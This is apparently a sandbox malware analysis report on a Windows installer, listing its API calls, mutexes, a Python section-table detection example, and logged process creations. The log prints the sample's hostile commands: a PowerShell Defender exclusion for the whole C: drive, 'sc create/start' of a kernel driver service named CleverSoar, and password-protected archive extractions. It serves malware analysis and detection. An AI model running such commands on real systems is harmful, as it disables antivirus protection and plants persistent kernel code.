Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp; Process information set: 01 00 00 00 (the BreakOnTermination flag named in the signature list: with ProcessBreakOnTermination set to 1 the process is treated as critical, so terminating it bugchecks the machine, which is why the event is classed here)

System Summary

Source: update.vbc.2.dr | Static PE information: section name: .aQ#
Source: hrsw.vbc.6.dr | Static PE information: section name: .aQ#
Source: update.vbc.6.dr | Static PE information: section name: .aQ#
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp | Code function: 6_2_6C9E3886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp | Code function: 6_2_6CB68810 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp | Code function: 6_2_6CB69450 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp | Code function: 6_2_6C9E3C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp | Code function: 6_2_6C9E3D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp | Code function: 6_2_6C9E3D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp | Code function: 6_2_6C9E39CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp | Code function: 6_2_6C9E3A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp | Code function: 6_2_6C9E1950: CreateFileA,DeviceIoControl,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp | Code function: 6_2_6C9E4754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp | Code functions (76, one row each in the report):
    6_2_6C9E4754, 6_2_6CD48D12, 6_2_6CCB4F0A, 6_2_6CCD3881, 6_2_6CD3B06F, 6_2_6CB64860, 6_2_6CB6A133, 6_2_6CC77A46, 6_2_6CCECB30, 6_2_6CC38D90,
    6_2_6CC16D50, 6_2_6CBEAD43, 6_2_6CC1CE80, 6_2_6CBF4F11, 6_2_6CC2A8C8, 6_2_6CC0889F, 6_2_6CC1C9F0, 6_2_6CC10AD0, 6_2_6CC14AA0, 6_2_6CC12A50,
    6_2_6CBB840A, 6_2_6CC225C0, 6_2_6CBE25EC, 6_2_6CC1C6E0, 6_2_6CC32640, 6_2_6CC0E650, 6_2_6CC367C0, 6_2_6CC3C700, 6_2_6CBB6092, 6_2_6CC22050,
    6_2_6CC1A1F0, 6_2_6CC20280, 6_2_6CC20380, 6_2_6CBC9CE0, 6_2_6CC37DE0, 6_2_6CC19D10, 6_2_6CB9BEA1, 6_2_6CC21EF0, 6_2_6CBEDEEF, 6_2_6CBB5EC9,
    6_2_6CC2F8D0, 6_2_6CBE7896, 6_2_6CC37870, 6_2_6CC11810, 6_2_6CC29820, 6_2_6CC39999, 6_2_6CC2B950, 6_2_6CC19900, 6_2_6CB9B972, 6_2_6CC2D930,
    6_2_6CC27AA0, 6_2_6CBF3A52, 6_2_6CC31BC0, 6_2_6CC0DB90, 6_2_6CBA3BCA, 6_2_6CBB3B66, 6_2_6CC214D0, 6_2_6CBFB4AC, 6_2_6CC27489, 6_2_6CC175D0,
    6_2_6CC15580, 6_2_6CC1F580, 6_2_6CC05521, 6_2_6CC2B520, 6_2_6CC376C0, 6_2_6CC31600, 6_2_6CC397C0, 6_2_6CBFF7F3, 6_2_6CC297A0, 6_2_6CB9F7CF,
    6_2_6CC210E0, 6_2_6CC13020, 6_2_6CC2F2A0, 6_2_6CC2B200, 6_2_6CC26750, 6_2_6CC29AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code functions (69, one row each in the report):
    9_2_005A81EC, 9_2_005E81C0, 9_2_005D4250, 9_2_005F8240, 9_2_005FC3C0, 9_2_005F04C8, 9_2_005D8650, 9_2_005DC950, 9_2_005B0943, 9_2_005D8C20,
    9_2_005F0E00, 9_2_005F4EA0, 9_2_005ED089, 9_2_005C10AC, 9_2_005F1120, 9_2_005DD1D0, 9_2_005F91C0, 9_2_005E5180, 9_2_005FD2C0, 9_2_005653CF,
    9_2_005C53F3, 9_2_005FD470, 9_2_005F54D0, 9_2_005AD496, 9_2_005F1550, 9_2_00561572, 9_2_005B9652, 9_2_005ED6A0, 9_2_00579766, 9_2_005697CA,
    9_2_005FD9E0, 9_2_00561AA1, 9_2_005E5E80, 9_2_005E5F80, 9_2_0057E00A, 9_2_005E22E0, 9_2_00602300, 9_2_005CE49F, 9_2_005E25F0, 9_2_005D66D0,
    9_2_005DA6A0, 9_2_005FE990, 9_2_005E2A80, 9_2_005BAB11, 9_2_005E6CE0, 9_2_005E70D0, 9_2_005CB121, 9_2_005DB180, 9_2_005F7200, 9_2_005FF3C0,
    9_2_0058B3E4, 9_2_005EF3A0, 9_2_005D7410, 9_2_005EF420, 9_2_005DF500, 9_2_005F3530, 9_2_0060351A, 9_2_005FF599, 9_2_00603601, 9_2_005F77C0,
    9_2_005D3790, 9_2_0058F8E0, 9_2_005DF910, 9_2_0057BAC9, 9_2_005E7AF0, 9_2_005B3AEF, 9_2_005E7C50, 9_2_0057BC92, 9_2_005DFDF0
Source: Joe Sandbox View | Dropped File: C:\Program Files (x86)\Windows NT\hrsw.vbc 34063D8A5CC7DE10C1514FD21463D4E5A0E99CFAB7A8EE1168E84EDE8823EDFB
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process token adjusted: Security
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp | Code function: String function: 6CB9C240 appears 53 times
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp | Code function: String function: 6CC39F10 appears 727 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 00561E40 appears 152 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 005628E3 appears 34 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 005FFB10 appears 723 times
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp.5.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp.5.dr | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp.0.dr | Static PE information: Number of sections : 11 > 10
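The two static findings above (section name ".aQ#" on the dropped .vbc files earlier in this section, and "Number of sections : 11 > 10" here) both come from the PE section table. The following is an added example, not Joe Sandbox code: it parses the section table of a PE image and applies both checks. The PE image it runs on is constructed in memory with a hypothetical section list; only the ".aQ#" name and the 10-section threshold are taken from the report.

```python
"""Static PE section-table checks: odd section names and section count.
Added example; the PE image is constructed here, it is not the sample."""
import re
import struct
from typing import List

# IMAGE_SECTION_HEADER: Name[8], VirtualSize, VirtualAddress, SizeOfRawData,
# PointerToRawData, PointerToRelocations, PointerToLinenumbers,
# NumberOfRelocations, NumberOfLinenumbers, Characteristics (40 bytes).
SECTION_HDR = struct.Struct("<8sIIIIIIHHI")
# Conventional section names use letters, digits, '.', '_' and '$'.
NAME_OK = re.compile(rb"^[A-Za-z0-9._$]+$")
MAX_SECTIONS = 10   # threshold the report applies


def build_pe(section_names: List[bytes], opt_size: int = 224) -> bytes:
    """Construct a minimal 32-bit PE (headers only) with the given sections."""
    e_lfanew = 0x80
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    dos += b"\0" * (e_lfanew - len(dos))
    # COFF header: Machine=i386, NumberOfSections, 3 zero dwords,
    # SizeOfOptionalHeader, Characteristics=EXECUTABLE_IMAGE|32BIT_MACHINE.
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, opt_size, 0x0102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)   # PE32 magic, rest zero
    sections = b"".join(
        SECTION_HDR.pack(name.ljust(8, b"\0")[:8], 0x1000, 0x1000 * (i + 1),
                         0, 0, 0, 0, 0, 0, 0x60000020)
        for i, name in enumerate(section_names))
    return dos + b"PE\0\0" + coff + opt + sections


def section_names(pe: bytes) -> List[bytes]:
    """Walk DOS header -> PE signature -> COFF header -> section table."""
    if pe[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # NumberOfSections is at COFF+2, SizeOfOptionalHeader at COFF+16.
    nsect, opt_size = struct.unpack_from("<H12xH", pe, e_lfanew + 6)
    table = e_lfanew + 24 + opt_size
    names = []
    for i in range(nsect):
        raw = SECTION_HDR.unpack_from(pe, table + i * SECTION_HDR.size)[0]
        names.append(raw.rstrip(b"\0"))
    return names


def section_findings(pe: bytes) -> List[str]:
    """Return the report-style findings for the two checks."""
    names = section_names(pe)
    findings = []
    if len(names) > MAX_SECTIONS:
        findings.append(f"Number of sections : {len(names)} > {MAX_SECTIONS}")
    for n in names:
        if not NAME_OK.match(n):
            findings.append(f"section name with special chars: {n.decode('latin-1')}")
    return findings


if __name__ == "__main__":
    for f in section_findings(build_pe([b".text", b".rdata", b".aQ#"])):
        print(f)
```

To apply the same checks to the real dropped files, read the file bytes into `section_findings`; a PE built by a packer will often also trip the section-count rule, as the installer and both extracted .tmp files do here.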
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe, 00000000.00000000.2105947406.00000000003C9000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileNameOtgA1A8ax7m.exe vs #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe, 00000000.00000003.2108502231.000000007F3FA000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameOtgA1A8ax7m.exe vs #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe, 00000000.00000003.2108115656.0000000002F7E000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameOtgA1A8ax7m.exe vs #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe | Binary or memory string: OriginalFileNameOtgA1A8ax7m.exe vs #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.12.dr | Binary string: \Device\TfSysMon
Source: tProtect.dll.12.dr | Binary string: \Device\TfKbMonPWLCache
Source: classification engine | Classification label: mal92.evad.winEXE@142/31@0/0
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp | Code function: 6_2_6CB69450 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_00569313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_00573D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_00569252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp | Code function: 6_2_6CB68930 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,Process32NextW
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp | File created: C:\Program Files (x86)\Windows NT\is-BAR93.tmp
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6932:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2248:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5020:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2224:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3768:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2852:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5732:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:64:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5800:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6284:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4980:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2064:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3280:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5132:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6332:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:776:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6664:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5000:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1176:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:764:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2544:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4888:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3300:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5072:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5368:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5776:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6244:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5740:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5100:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1668:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4904:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6548:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2192:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6944:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe | File created: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe | Virustotal: Detection: 9%
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe | String found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe | File read: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe
Source: unknown | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe "C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe | Process created: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp "C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp" /SL5="$20406,8071911,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe"
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe "C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe | Process created: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp "C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp" /SL5="$30420,8071911,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe" /VERYSILENT
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
(the three process creations above, cmd.exe -> sc.exe -> conhost.exe for "sc start CleverSoar", appear 12 times in the report)
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
